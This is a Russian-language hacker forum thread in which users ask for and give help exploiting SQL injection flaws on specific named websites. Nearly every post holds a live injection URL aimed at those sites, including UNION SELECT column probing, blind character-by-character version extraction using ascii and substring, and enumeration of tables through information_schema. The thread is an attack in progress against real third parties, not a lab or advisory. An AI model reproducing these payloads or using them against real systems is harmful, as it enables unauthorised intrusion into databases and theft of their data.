Ваши вопросы по уязвимостям.

нашел sql inc не могу пробить
помогите
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=999999
уже все испробовал

 

bag врать нехорошо. читай маны и пробуй, там все самое элементарное.
сам не попробуешь - подсказок не будет)

 

ок,пробовал
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=1+group+by+1/* загрузилась
пробую
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=1+union+select+1/*
The used SELECT statements have a different number of columns

 

только эти два запроса? чтоже ты хотел ими сделать?

 

да не только ими, читаю мануалы,статьи,пока ничего не выходит

 

ну кто-нибудь может мне помочь? уже замучился :/

 

xcedz, спасибо канечно, но это я давно нашел, я хотел бы разобраться с
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=

 

народ может кто посмотрит? забадался

 

не хочется флудить, но меня тоже интересует решение этой задачи :

Бы ло бы интересно увидеть какой тут должен быть запрос.

 

http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=2+and+ascii(lower(substring((select+version()),1,1)))=0x35/*

т.е. посимвольный брут. ошибка после селекта может быть там во многих случаях. к примеру там идет два и более перекрестных запроса на данную переменную, имеющих различные кол-ва колонок

 

спасибо,есть над чем подумать

 

sql-inj или нет
http://www.sceleton.dom.raid.ru/index.php?act='
http://link.raid.ru/browse.php?cat=-5'
может быть отключён вывод ошибок но немогу подобрать кол-во таблиц

 

может кто посмотрит?

 

http://link.raid.ru/browse.php?cat=-1+union+select+version()/*

 

тоха респект тебе)

 

http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*

Forbidden
You don't have permission to access /browse.php on this server.

Хотя user(),database(),version() выполняются

 

тьфу блин тупею...

 

Там мукул четвертый, information_schema там нет.

PHP:

http://link.raid.ru/browse.php?cat=-1+union+select+table_name+from+information_schema.tables/*

 

http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid=2+and+ascii(lower(substring((select+version( )),1,1)))=0x35/*
можно ли этим способом вывести строчку или какой нить символ чтобы можно было увидеть инъекцию?

 

Там мукул четвертый, скорее всего information_schema там нет.

гыгыгыг, ога, information_schema это такая непостоянная фигня, где заочет там и появляется, обычно она в пятой версии но иногда и в 4, хотя скорее всего там нет
пиздец!